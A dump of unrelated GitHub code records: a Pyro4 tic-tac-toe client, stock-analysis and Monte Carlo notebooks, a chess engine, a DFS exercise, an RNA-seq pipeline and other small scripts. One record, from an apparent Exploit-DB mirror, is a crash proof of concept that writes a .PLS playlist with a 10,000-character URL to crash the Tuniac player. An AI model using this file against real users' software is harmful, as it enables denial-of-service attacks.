% (self.identifier, obj, self.host, self.port)\n self.objects[obj] = Pyro4.Proxy(url)\n\n def GetObject(self, name):\n return self.objects[name]\n\n\nclass TicTacToeClient:\n\n def __init__(self, host: str, port: int, identifier=\"main-\", servers=[]):\n self.client = Client(host, port, identifier)\n self.servers = list()\n self.serverName = servers\n self.mainServer = None\n self.pawnType : int = None\n self.roomCode : int = None\n self.hashState : int = 0\n self.placementList : typ.Sequence[modelMod.Placement] = list()\n self.placementHistory : typ.Sequence[modelMod.Placement] = list()\n self.placementMap : typ.Dict[modelMod.Location, modelMod.Placement] = dict()\n self.refindServer(servers)\n\n def refindServer(self, servers: typ.Sequence[str]):\n self.client.Start(servers)\n for server in servers:\n serverProxy = self.client.GetObject(server)\n self.servers.append(serverProxy)\n\n def getRoomCode(self):\n return self.roomCode\n\n def placePawn(self, posX: int, posY: int) -> bool:\n server = self.getActiveServer()\n resp = 
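The same O(1)-space recurrence as bottomUpWithTabulation in this record, written front-to-back so no index bounds check is needed; prev and prev2 track dp[i-1] and dp[i-2]:

def rob(nums):
    prev, prev2 = 0, 0
    for x in nums:
        # Either skip house x (prev) or take it on top of dp[i-2] (prev2 + x).
        prev, prev2 = max(prev, prev2 + x), prev
    return prev

assert rob([2, 7, 9, 3, 1]) == 12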
server.placePawn(self.roomCode, posX, posY, self.pawnType)\n resp = self._parseResponse(resp)\n return resp is self.pawnType\n\n def createRoom(self):\n server = self.getActiveServer()\n resp = server.createRoom()\n self.roomCode = self._parseResponse(resp)\n self.joinRoom(self.roomCode)\n\n def joinRoom(self, code: int):\n server = self.getActiveServer()\n resp = server.joinRoom(code)\n self.pawnType = self._parseResponse(resp)\n self.roomCode = code\n \n def synchronize(self):\n server = self.getActiveServer()\n resp = server.listPlacement(self.hashState)\n parsedResp = self._parseResponse(resp)\n self.hashState = parsedResp[\"hashState\"]\n for rawPlacement in parsedResp[\"placements\"]:\n roomCode = rawPlacement[\"room\"][\"code\"]\n pawnType = rawPlacement[\"type\"]\n xPos = rawPlacement[\"location\"][\"x\"]\n yPos = rawPlacement[\"location\"][\"y\"]\n location = modelMod.Location(xPos, yPos)\n placement = modelMod.Placement(roomCode, pawnType, location)\n if roomCode == self.roomCode:\n self.placementHistory.append(placement)\n self.placementList.append(placement)\n self.placementMap[location] = placement\n\n def getActiveServer(self):\n if self.mainServer is not None:\n try:\n self.mainServer._pyroBind()\n return self.mainServer\n except Exception as e:\n self.mainServer = None\n\n if self.mainServer is None:\n deleteList = list()\n for server in self.servers:\n try:\n server._pyroBind()\n self.mainServer = server\n except Exception as e:\n print(str(e))\n deleteList.append(server)\n pass\n for delete in deleteList:\n try:\n self.servers.remove(delete)\n except:\n pass\n \n if self.mainServer is not None:\n return self.mainServer\n \n self.refindServer(self.serverName)\n\n if self.mainServer is None:\n deleteList = list()\n for server in self.servers:\n try:\n server._pyroBind()\n self.mainServer = server\n except Exception as e:\n print(str(e))\n deleteList.append(server)\n pass\n for delete in deleteList:\n try:\n self.servers.remove(delete)\n except:\n pass\n \n if self.mainServer is not None:\n return self.mainServer\n raise Exception(\"Failed To Connect to all server\")\n\n def getPawnAtCoordinate(self, xPos: int, yPos: int):\n location = modelMod.Location(xPos, yPos)\n if location in self.placementMap:\n return self.placementMap[location]\n return None\n\n def getPawnType(self) -> int:\n return self.pawnType\n\n def _parseResponse(self, response: str) -> typ.Any:\n result : typ.Dict[str, typ.Any] = json.loads(response)\n if \"error\" in result:\n raise Exception(result[\"error\"])\n return result[\"response\"]\n\n def getPlacementHistory(self) -> typ.Sequence[modelMod.Placement]:\n return self.placementHistory\n \n def getPlacement(self) -> typ.Sequence[modelMod.Placement]:\n return self.placementList","repo_name":"firmanmm/tic-tac-royale","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32579765838","text":"#!/usr/bin/env python\n# Tuniac v.090517c (.PLS) Crash PoC\n# By : zAx\n# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download\n\nbuffer = (\"[playlist]\\x0ANumberOfEntries=1\\x0AFile1=http://\" + \"\\x41\" * (10000));\n\nf = open('Crash_Poc.PLS','w');\nf.write(buffer);\nf.close();\n\n# milw0rm.com [2009-09-14]","repo_name":"ryanmrestivo/red-team","sub_path":"_Resources/Exploit DB 
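A minimal sketch of the PYRONAME lookup that Client.Start performs above; the object name, host, and port are placeholders, and the proxy stays unconnected until first use:

import Pyro4

uri = "PYRONAME:main-gameserver@localhost:9090"  # placeholder name/host/port
proxy = Pyro4.Proxy(uri)
# proxy._pyroBind()  # would connect eagerly and raise if the server is down,
#                    # which is how getActiveServer() above probes liveness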
2021-12-11/exploits/windows/dos/9671.py","file_name":"9671.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"10690843180","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %%\nimport pandas as pd\nfrom pandas import Series, DataFrame\nimport numpy as np\n\n\n# %%\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_style('whitegrid')\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# %%\nfrom pandas_datareader import DataReader\n\n\n# %%\nfrom datetime import datetime\n\n\n# %%\nfrom __future__ import division\n\n# %% [markdown]\n# Congrats on finishing the Stock Market Data Analysis project! Here are some additional quesitons and excercises for you to do:\n# \n# 1.) Estimate the values at risk using both methods we learned in this project for a stock not related to technology.\n# \n# 2.) Build a practice portfolio and see how well you can predict you risk values with real stock information!\n# \n# 3.) Look further into correlatino of two stocks and see if that gives you any insight into future possible stock prices.\n\n# %%\nfood_list = ['WEAT','SOYB','CORN','CANE']\n\n\n# %%\nend = datetime.now()\n\nstart = datetime(end.year-1, end.month, end.day)\n\n\n# %%\nfor stock in food_list:\n globals()[stock] = DataReader(stock,data_source='yahoo',start=start,end=end)\n\n\n# %%\nWEAT.head()\n\n\n# %%\n# Moving Average\nma_day = [10,20,50]\n\nfor ma in ma_day:\n column_name = \"MA for %s days\" %(str(ma))\n WEAT[column_name] = WEAT['Adj Close'].rolling(ma).mean()\n\n\n# %%\nWEAT[['Adj Close','MA for 10 days','MA for 20 days','MA for 50 days']].plot(subplots=False,figsize=(10,4))\n\n\n# %%\nclosing_df = DataReader(food_list,'yahoo',start,end)['Adj Close']\n\n\n# %%\nclosing_df.head()\n\n\n# %%\nfood_rets = closing_df.pct_change()\n\n\n# %%\nfood_rets.head()\n\n\n# %%\nsns.jointplot(x='WEAT',y='CORN',data=food_rets,kind='scatter',color='seagreen')\n\n\n# %%\nsns.pairplot(food_rets.dropna())\n\n\n# %%\nreturns_fig = sns.PairGrid(food_rets.dropna())\n\nreturns_fig.map_upper(plt.scatter,color='purple')\n\nreturns_fig.map_lower(sns.kdeplot,cmap='cool_d')\n\nreturns_fig.map_diag(plt.hist,bins=30)\n\n\n# %%\nreturns_fig = sns.PairGrid(closing_df)\n\nreturns_fig.map_upper(plt.scatter,color='purple')\n\nreturns_fig.map_lower(sns.kdeplot,cmap='cool_d')\n\nreturns_fig.map_diag(plt.hist,bins=30)\n\n\n# %%\n# 1. 
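The "MA for N days" columns built in the loop above come from pandas' rolling window; a tiny self-contained sketch:

import pandas as pd

prices = pd.Series([1.0, 2.0, 3.0, 4.0, 5.0])
ma3 = prices.rolling(3).mean()   # NaN for the first two rows, then windowed means
assert ma3.iloc[-1] == 4.0       # mean of 3, 4, 5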
Risk Analysis\nrets = food_rets.dropna()\n\n\n# %%\narea = np.pi*20\n\nplt.scatter(rets.mean(),rets.std(),s = area)\n\nplt.ylim([0.01,0.025])\nplt.xlim([-0.003,0.004])\n\nplt.xlabel('Expected Return')\nplt.ylabel('Risk')\n\nfor label, x, y in zip(rets.columns, rets.mean(), rets.std()):\n plt.annotate(\n label,\n xy= (x, y), xytext = (50, 50),\n textcoords = 'offset points', ha = 'right', va = 'bottom',\n arrowprops = dict(arrowstyle = '-', connectionstyle = 'arc3,rad=-0.3')\n )\n\n\n# %%\n# Predict future stock\ndays = 365\n\ndt = 1/days\n\nmu = rets.mean()['WEAT']\n\nsigma = rets.std()['WEAT']\n\n\n# %%\ndef stock_monte_carlo(start_price,days,mu,sigma):\n\n price = np.zeros(days)\n price[0] = start_price\n\n shock = np.zeros(days)\n drift = np.zeros(days)\n\n for x in range(1, days):\n\n shock[x] = np.random.normal(loc=mu*dt, scale=sigma*np.sqrt(dt))\n\n drift[x] = mu * dt\n\n price[x] = price[x-1] + (price[x-1] * (drift[x] + shock[x]))\n \n return price\n\n\n# %%\nWEAT.head()\n\n\n# %%\nstart_price = 5.42\n\n\n# %%\nruns = 10000\n\nsimulations = np.zeros(runs)\n\nfor run in range(runs):\n simulations[run] = stock_monte_carlo(start_price, days, mu, sigma)[days-1]\n\n\n# %%\nq = np.percentile(simulations, 1)\n\nplt.hist(simulations, bins=200)\n\n# Starting Price\nplt.figtext(0.6, 0.8, s='Start price: $%.2f' %start_price)\n# Mean ending price\nplt.figtext(0.6, 0.7, 'Mean final price: $%.2f' % simulations.mean())\n\n# Variance of the price (within 99% confidence interval)\nplt.figtext(0.6, 0.6, 'VaR(0.99): $%.2f' % (start_price - q,))\n\n# Display 1% quantile\nplt.figtext(0.15, 0.6, 'q(0.99): $%.2f' % q)\n\n# Plot a line at the 1% quantile result\nplt.axvline(x=q, linewidth=4, color='r')\n\n# Title\nplt.title(u'Final price distribution for Wheat Stock after %s days' % days, weight='bold')\n\n\n","repo_name":"abel672/python-data-analysis-visualization","sub_path":"Section-8-Example-Projects/01-Stock-Market-Analysis-Excercise.py","file_name":"01-Stock-Market-Analysis-Excercise.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72797012854","text":"\n\n#Define clases\nclass Board:\n '''\n Initial state of the board\n '''\n def __init__(self):\n self.board = [\n ['br', 'bn', 'bb', 'bq', 'bk', 'bb', 'bn', 'br'],\n ['bp', 'bp', 'bp', 'bp', 'bp', 'bp', 'bp', 'bp'],\n ['--', '--', '--', '--', '--', '--', '--', '--'],\n ['--', '--', '--', '--', '--', '--', '--', '--'],\n ['--', '--', '--', '--', '--', '--', '--', '--'],\n ['--', '--', '--', '--', '--', '--', '--', '--'],\n ['wp', 'wp', 'wp', 'wp', 'wp', 'wp', 'wp', 'wp'],\n ['wr', 'wn', 'wb', 'wq', 'wk', 'wb', 'wn', 'wr'],\n ]\n self.white_to_move = True\n self.moves = []\n self.wk_position = (7, 4)\n self.bk_position = (0, 4)\n \n\n '''\n Takes a move and changes the state of the board making the move\n '''\n def make_move(self, move):\n self.board[move.start_row][move.start_col] = '--' #Changes the board state\n self.board[move.end_row][move.end_col] = move.piece_moved #Changes the board state\n self.white_to_move = not self.white_to_move #Changes the turn\n #Pawn promotion\n if move.end_row == 0 and move.piece_moved == 'wp':\n self.board[move.end_row][move.end_col] = 'wq'\n if move.end_row == 7 and move.piece_moved == 'bp':\n self.board[move.end_row][move.end_col] = 'bq'\n #Update kings position\n if move.piece_moved == 'wk':\n self.wk_position = (move.end_row, move.end_col)\n print(self.wk_position)\n if move.piece_moved == 'bk':\n 
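The VaR figure printed above is just the gap between the start price and the 1% quantile of simulated end prices; a sketch on synthetic endpoints standing in for the Monte Carlo runs:

import numpy as np

rng = np.random.default_rng(0)
simulations = rng.normal(loc=5.42, scale=0.5, size=10_000)  # stand-in endpoints
q = np.percentile(simulations, 1)
var_99 = 5.42 - q   # loss not exceeded with 99% confidence
assert var_99 > 0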
self.bk_position = (move.end_row, move.end_col)\n self.moves.append(move)\n \n '''\n Undo the last move\n '''\n def undo_move(self, move):\n self.board[move.start_row][move.start_col] = move.piece_moved #Changes the board state\n self.board[move.end_row][move.end_col] = move.piece_captured #Changes the board state\n self.white_to_move = not self.white_to_move #Changes the turn\n self.moves.pop()\n\n '''\n Gets all the legal moves considering checks\n '''\n def get_valid_moves(self):\n #Generate all legal moves\n legal_moves = self.get_legal_moves()\n #For each move make the move\n for i in range(len(legal_moves)-1, -1, -1):\n move = legal_moves[i]\n self.make_move(move)\n #Generate all legal moves for the oponent\n oponents_moves = self.get_legal_moves()\n #See if any of them atack our king\n self.white_to_move = not self.white_to_move\n if self.in_check():\n legal_moves.remove(legal_moves[i]) #Remove move\n self.white_to_move = not self.white_to_move\n self.undo_move(move)\n return legal_moves \n\n '''\n Determin if a player is in check\n '''\n def in_check(self):\n if self.white_to_move:\n return self.square_under_attack(self.wk_position[0], self.wk_position[1])\n else:\n return self.square_under_attack(self.bk_position[0], self.bk_position[1])\n\n '''\n Determin if oponent can atack the square r, c\n '''\n def square_under_attack(self, r, c):\n self.white_to_move = not self.white_to_move\n oponents_move = self.get_legal_moves()\n self.white_to_move = not self.white_to_move\n for move in oponents_move:\n if move.end_row == r and move.end_col == c:\n return True\n return False\n\n '''\n Gets all the legal moves\n '''\n def get_legal_moves(self):\n legal_moves = []\n for r in range(0, 8):\n for c in range(0, 8):\n color = self.board[r][c][0]\n if (color == 'w' and self.white_to_move) or (color == 'b' and not self.white_to_move):\n piece = self.board[r][c][1]\n if piece == 'p':\n self.get_pawn_moves(r, c, legal_moves)\n if piece == 'k':\n self.get_king_moves(r, c, legal_moves)\n if piece == 'r':\n self.get_rook_moves(r, c, legal_moves)\n if piece == 'b':\n self.get_bishop_moves(r, c, legal_moves)\n if piece == 'q':\n self.get_queen_moves(r, c, legal_moves)\n if piece == 'n':\n self.get_knight_moves(r, c, legal_moves)\n return legal_moves\n\n def get_pawn_moves(self, row, col, legal_moves):\n if self.white_to_move:\n if self.board[row-1][col] == '--':\n legal_moves.append(Move((row, col), (row-1, col), self.board))\n if row == 6 and self.board[row-2][col] == '--' and self.board[row-1][col] == '--':\n legal_moves.append(Move((row, col), (row-2, col), self.board))\n try:\n if self.board[row-1][col-1] != '--' and self.board[row-1][col-1][0] != 'w':\n legal_moves.append(Move((row, col), (row-1, col-1), self.board))\n if self.board[row-1][col+1] != '--' and self.board[row-1][col+1][0] != 'w':\n legal_moves.append(Move((row, col), (row-1, col+1), self.board))\n except:\n pass\n else:\n if self.board[row+1][col] == '--':\n legal_moves.append(Move((row, col), (row+1, col), self.board))\n if row == 1 and self.board[row+2][col] == '--' and self.board[row+1][col] == '--':\n legal_moves.append(Move((row, col), (row+2, col), self.board))\n try:\n if self.board[row+1][col-1] != '--' and self.board[row+1][col-1][0] != 'b':\n legal_moves.append(Move((row, col), (row+1, col-1), self.board))\n if self.board[row+1][col+1] != '--' and self.board[row+1][col+1][0] != 'w':\n legal_moves.append(Move((row, col), (row+1, col+1), self.board))\n except:\n pass\n\n def get_king_moves(self, row, col, legal_moves):\n 
king_moves = ((-1, -1), (1, 1), (0, 1), (1, 0), (0, -1), (-1, 0), (1, -1), (-1, 1))\n ally_color = 'w' if self.white_to_move else 'b'\n for i in range(8):\n end_row = row + king_moves[i][0]\n end_col = col + king_moves[i][1]\n if 0 <= end_row <= 7 and 0 <= end_col <= 7:\n end_piece = self.board[end_row][end_col]\n if end_piece[0] != ally_color:\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n\n def get_rook_moves(self, row, col, legal_moves):\n directions = ((-1, 0), (0, 1), (1, 0), (0, -1))\n ally_color = 'w' if self.white_to_move else 'b'\n for i in range(4):\n for j in range(1, 8):\n end_row = row + directions[i][0] * j\n end_col = col + directions[i][1] * j\n if 0 <= end_row <= 7 and 0 <= end_col <= 7:\n end_piece = self.board[end_row][end_col]\n if end_piece == '--':\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n else:\n if end_piece[0] == ally_color:\n break\n elif end_piece[0] != ally_color:\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n break\n else: \n break\n\n def get_bishop_moves(self, row, col, legal_moves):\n directions = ((-1, 1), (1, 1), (1, -1), (-1, -1))\n ally_color = 'w' if self.white_to_move else 'b'\n for i in range(4):\n for j in range(1, 8):\n end_row = row + directions[i][0] * j\n end_col = col + directions[i][1] * j\n if 0 <= end_row <= 7 and 0 <= end_col <= 7:\n end_piece = self.board[end_row][end_col]\n if end_piece == '--':\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n else:\n if end_piece[0] == ally_color:\n break\n elif end_piece[0] != ally_color:\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n break\n else: \n break\n\n def get_queen_moves(self, row, col, legal_moves):\n directions = ((-1, 0), (0, 1), (1, 0), (0, -1), (-1, 1), (1, 1), (1, -1), (-1, -1))\n ally_color = 'w' if self.white_to_move else 'b'\n for i in range(8):\n for j in range(1, 8):\n end_row = row + directions[i][0] * j\n end_col = col + directions[i][1] * j\n if 0 <= end_row <= 7 and 0 <= end_col <= 7:\n end_piece = self.board[end_row][end_col]\n if end_piece == '--':\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n else:\n if end_piece[0] == ally_color:\n break\n elif end_piece[0] != ally_color:\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n break\n else: \n break\n\n def get_knight_moves(self, row, col, legal_moves):\n knight_moves = ((1, 2), (1, -2), (-1, -2), (-1, 2), (2, 1), (2, -1), (-2, -1), (-2, 1))\n ally_color = 'w' if self.white_to_move else 'b'\n for i in range(8):\n end_row = row + knight_moves[i][0]\n end_col = col + knight_moves[i][1]\n if 0 <= end_row <= 7 and 0 <= end_col <= 7:\n end_piece = self.board[end_row][end_col]\n if end_piece[0] != ally_color:\n legal_moves.append(Move((row, col), (end_row, end_col), self.board))\n \n\n \nclass Move():\n ranks_to_rows = {'1':7, '2':6, '3':5, '4':4,\n '5':3, '6':2, '7':1, '8':0}\n rows_to_ranks = {v:k for k,v in ranks_to_rows.items()}\n\n files_to_cols = {'a':0, 'b':1, 'c':2, 'd':3,\n 'e':4, 'f':5, 'g':6, 'h':7}\n cols_to_files = {v:k for k,v in files_to_cols.items()}\n\n '''\n Initial state of a move\n '''\n def __init__(self, start_square, end_square, board):\n self.start_row = start_square[0]\n self.start_col = start_square[1]\n self.end_row = end_square[0]\n self.end_col = end_square[1]\n self.piece_moved = board[self.start_row][self.start_col]\n self.piece_captured = board[self.end_row][self.end_col]\n self.move_id = self.start_row * 1000 + self.start_col 
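get_rook_moves, get_bishop_moves, and get_queen_moves above repeat one ray-walking pattern and differ only in their direction tuples; a sketch of the shared core:

def ray_squares(row, col, directions):
    # Walk outward along each direction until the board edge (capture/blocker
    # handling, done inline above, is omitted here).
    for dr, dc in directions:
        r, c = row + dr, col + dc
        while 0 <= r <= 7 and 0 <= c <= 7:
            yield r, c
            r, c = r + dr, c + dc

ROOK_DIRS = ((-1, 0), (0, 1), (1, 0), (0, -1))
assert (0, 4) in set(ray_squares(4, 4, ROOK_DIRS))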
* 100 + self.end_row * 10 + self.end_col\n\n '''\n Overwrites equal instances\n '''\n def __eq__(self, other):\n if isinstance(other, Move):\n return self.move_id == other.move_id\n return False\n\n '''\n Gets the actual chess notation\n '''\n def get_chess_notation(self, row, col):\n line = self.cols_to_files[col]\n rank = self.rows_to_ranks[row]\n if self.piece_captured != '--':\n return self.piece_moved + 'x' + line + rank\n else:\n return self.piece_moved + line + rank\n\n \n\n\n\n","repo_name":"MartinSpiguel/Chess_game","sub_path":"chess_engine.py","file_name":"chess_engine.py","file_ext":"py","file_size_in_byte":11381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73023471412","text":"from RecursiveShadowCasting import Fov_RSC\n\nwidth = 9\nheight = 9\nfov = Fov_RSC(width, height)\ntestmap = [[True for y in range(height)] for x in range(width)]\nfor y in range(height):\n for x in range(width):\n if x == 0 or y == 0 or x == width - 1 or y == height - 1:\n testmap[x][y] = False\nresult = fov.Calculate_Sight(testmap, 4, 4, 4)\ns = ''\nfor y in range(height):\n for x in range(width):\n if result[x][y]:\n if testmap[x][y]:\n s += '.'\n else:\n s += '#'\n else:\n s += '▒'\n s += '\\n'\nprint(s)\n","repo_name":"Akhier/Py-RecursiveShadowCasting","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37223927098","text":"from sklearn.ensemble import RandomForestClassifier\nrandom_forest = RandomForestClassifier(n_estimators = 100) \nrandom_forest.fit(X_train, Y_train)\nprint(random_forest.score(X_train, Y_train))\nprint(random_forest.score(X_test, Y_test))\n\nimport xgboost as xgb\nboosting_model = xgb.XGBClassifier(n_estimators = 100)\nboosting_model.fit(X_train, Y_train) # 학습\nprint(boosting_model.score(X_train, Y_train))\nprint(boosting_model.score(X_test, Y_test))","repo_name":"badjiyoon/da_study","sub_path":"KiYoung/ch5_4.py","file_name":"ch5_4.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2366850609","text":"from collections import deque\n#스택이용- 재귀 이용\ndef dfs(graph, v, visited):\n visited[v]=True #방문한 노드를 true로 변경\n print(v,end=' ')\n for i in graph[v]:\n if not visited[i]:\n dfs(graph,i,visited)\n \n\ngraph = [\n [],\n [2,3,8],\n [1,7],\n [1,4,5],\n [3,5],\n [3,4],\n [7],\n [2,6,8],\n [1,7]\n]\n\nvisited = [False]*9\ndfs(graph,1,visited)","repo_name":"heekyoung2000/jungle-algorithm","sub_path":"third/DFS/DFSpra.py","file_name":"DFSpra.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41859749360","text":"import prettytable\n\nfrom pr_publisher.publishers.base import BasePublisher\n\n\nclass TablePublisher(BasePublisher):\n \"\"\"Prints pull requests in a table format to stdout\"\"\"\n\n def publish(self, publish_entries):\n fields = [\n \"reviews\",\n \"merge state\",\n \"action needed\",\n \"title\",\n \"created\",\n \"updated\",\n \"days since update\",\n \"link\",\n ]\n\n if self.args.show_labels:\n fields.append('labels')\n\n table = prettytable.PrettyTable(field_names=fields)\n\n for entry in publish_entries:\n row = [\n \"✓\" * entry.approval_count + \"✗\" * entry.request_changes_count,\n entry.mergeable_state,\n entry.action_string,\n entry.pr.title,\n 
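The DFSpra.py record's recursion, with its Korean comments rendered in English — mark the node visited, then recurse into unvisited neighbours:

def dfs(graph, v, visited, order):
    visited[v] = True            # mark the current node as visited
    order.append(v)
    for nxt in graph[v]:
        if not visited[nxt]:     # recurse only into unvisited neighbours
            dfs(graph, nxt, visited, order)

graph = [[], [2, 3, 8], [1, 7], [1, 4, 5], [3, 5], [3, 4], [7], [2, 6, 8], [1, 7]]
order = []
dfs(graph, 1, [False] * 9, order)
assert order == [1, 2, 7, 6, 8, 3, 4, 5]   # matches the record's printed output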
entry.pr.created_at.date(),\n entry.pr.updated_at.date(),\n round(entry.age_since_update_in_days),\n entry.pr.html_url,\n ]\n if self.args.show_labels:\n label_names = ' '.join(entry.label_names) if entry.label_names else ''\n row.append(label_names)\n\n table.add_row(row)\n print(table)\n","repo_name":"pglass/pr-publisher","sub_path":"pr_publisher/publishers/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23481360099","text":"import sys\nclass Solution(object):\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n if not prices:\n return 0\n\n maxx = -sys.maxint\n start = prices[0]\n end = 0\n for i in range(1, len(prices)):\n end = prices[i]\n maxx = max(maxx, end - start)\n start = min(start, end)\n return 0 if maxx < 0 else maxx\n","repo_name":"ynyeh0221/LeetCode","sub_path":"121. Best Time to Buy and Sell Stock.py","file_name":"121. Best Time to Buy and Sell Stock.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"2822899758","text":"\"\"\"\n Bir aracın km cinsinden gittiği yol bilgisini mil olarak yazdırınız.\n mil = km / 1.609344\n\"\"\"\nprint(\"kaç km yol gittiniz?\")\nmesafeKm = input()\nmesafeMil = float(mesafeKm) / 1.609344\nmesafeMil = round(mesafeMil, 2)\n\nprint(str(mesafeKm) + \" km = \" + str(mesafeMil) + \" mil.\")","repo_name":"mhoproje/MHarunAydeniz-pythoncalisma","sub_path":"data-types.py","file_name":"data-types.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7770963854","text":"\"\"\" 9. Procedimento que atualiza e/ou inclui o número no vetor \nde elementos se o número já foi encontrado ou não. 
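The Solution.maxProfit record above relies on the Python-2-only sys.maxint; the same single pass, tracking the minimum price so far, in Python 3:

def max_profit(prices):
    best, low = 0, float("inf")
    for p in prices:
        low = min(low, p)            # cheapest buy seen so far
        best = max(best, p - low)    # best sell at today's price
    return best

assert max_profit([7, 1, 5, 3, 6, 4]) == 5   # buy at 1, sell at 6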
\"\"\"\nimport numpy as np\n\ndef contaValor(matriz):\n print(matriz, '\\n')\n contador = {}\n for l in matriz:\n for c in l:\n if np.sum(matriz==c)>1:\n contador[c] = np.sum(matriz==c)\n for numero in contador:\n qtd = contador[numero]\n print(f'o valor {numero} repetiu {qtd}', end= ', ')\n print('\\n')\n\n\nmatriz_teste = np.array([[1,2,3,4,5],[6,7,8,9,10],[11,12,13,14,15],[16,17,18,19,20],[21,22,23,24,25],[26,27,28,29,30],[31,32,33,34,35],[36,37,38,39,40],[41,42,43,44,45],[1,2,3,4,5]])\ncontaValor(matriz_teste)","repo_name":"MateusFagunddes/python_logica","sub_path":"lista 5/exc17.py","file_name":"exc17.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9718327398","text":"import yaml\nfrom rkinf.cluster import start_cluster, stop_cluster\nfrom rkinf.log import setup_logging\nfrom rkinf.toolbox import (fastqc, cutadapt_tool, novoindex, novoalign,\n htseq_count)\nfrom bcbio.utils import safe_makedir\nimport sys\nimport os\n\nMAX_READ_LENGTH = 10000\n\n\ndef _get_stage_config(config, stage):\n return config[\"stage\"][stage]\n\n\ndef _get_program(config, stage):\n return config[\"stage\"][stage][\"program\"]\n\n\ndef main(config_file):\n with open(config_file) as in_handle:\n config = yaml.load(in_handle)\n setup_logging(config)\n from rkinf.log import logger\n start_cluster(config)\n\n from rkinf.cluster import view\n input_files = [os.path.join(config[\"dir\"][\"data\"], x) for x in\n config[\"input\"]]\n results_dir = config[\"dir\"][\"results\"]\n\n map(safe_makedir, config[\"dir\"].values())\n\n curr_files = input_files\n\n for stage in config[\"run\"]:\n if stage == \"fastqc\":\n nfiles = len(curr_files)\n logger.info(\"Running %s on %s\" % (stage, str(curr_files)))\n fastqc_config = _get_stage_config(config, stage)\n fastqc_outputs = view.map(fastqc.run, curr_files,\n [fastqc_config] * nfiles,\n [config] * nfiles)\n\n if stage == \"cutadapt\":\n nfiles = len(curr_files)\n cutadapt_config = _get_stage_config(config, stage)\n cutadapt_outputs = view.map(cutadapt_tool.run,\n curr_files,\n [cutadapt_config] * nfiles,\n [config] * nfiles)\n curr_files = cutadapt_outputs\n\n if stage == \"novoalign\":\n nfiles = len(curr_files)\n novoalign_config = _get_stage_config(config, stage)\n #db = novoindex.run(config[\"ref\"],\n # _get_stage_config(config, \"novoindex\"),\n # config)\n db = config[\"genome\"][\"file\"]\n novoalign_outputs = view.map(novoalign.run, curr_files,\n [db] * nfiles,\n [novoalign_config] * nfiles,\n [config] * nfiles)\n curr_files = novoalign_outputs\n\n if stage == \"htseq-count\":\n nfiles = len(curr_files)\n htseq_config = _get_stage_config(config, stage)\n htseq_outputs = view.map(htseq_count.run_with_config,\n curr_files,\n [config] * nfiles,\n [stage] * nfiles)\n combined_out = htseq_count.combine_counts(htseq_outputs,\n \"combined.counts\")\n\n stop_cluster()\n\n\nif __name__ == \"__main__\":\n main(*sys.argv[1:])\n","repo_name":"parveezsha/gitlabjuly","sub_path":"projects/slim_rnaseq/scripts/slim.py","file_name":"slim.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35664865055","text":"T = int(input())\nfor tc in range(1, T + 1):\n P = int(input())\n raw = list(map(int, input().split()))\n maxNum = max(raw)\n for n in raw:\n result = maxNum * n\n for x in raw:\n q, r = divmod(result, x)\n if r or q not in raw:\n break\n else:\n break\n print(\"#{} 
{}\".format(tc, result))\n","repo_name":"gogumasitda/TIL","sub_path":"algorithm/0627/보물왕태혁.py","file_name":"보물왕태혁.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"34436191332","text":"# flask dependencies\nfrom flask import Flask\nfrom flask import render_template \nfrom flask import jsonify\n\n# sql alchemy dependencies\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\n\n# Define the database connection parameters\nimport config\n# get username and password from config.py\nusername = config.username\npassword = config.password \n#username = \"postgres\"\n#password = \"postgres\"\n\n### define database variable \ndatabase_name = 'Population' # Created in Week 9, Night 1, Exercise 08-Stu_CRUD \nconnection_string = f'postgresql://{username}:{password}@localhost:5432/{database_name}'\n\n\n# Connect to the database\nengine = create_engine(connection_string)\n\n# reflect an existing database into a new model\nbase = automap_base()\n\n# reflect the 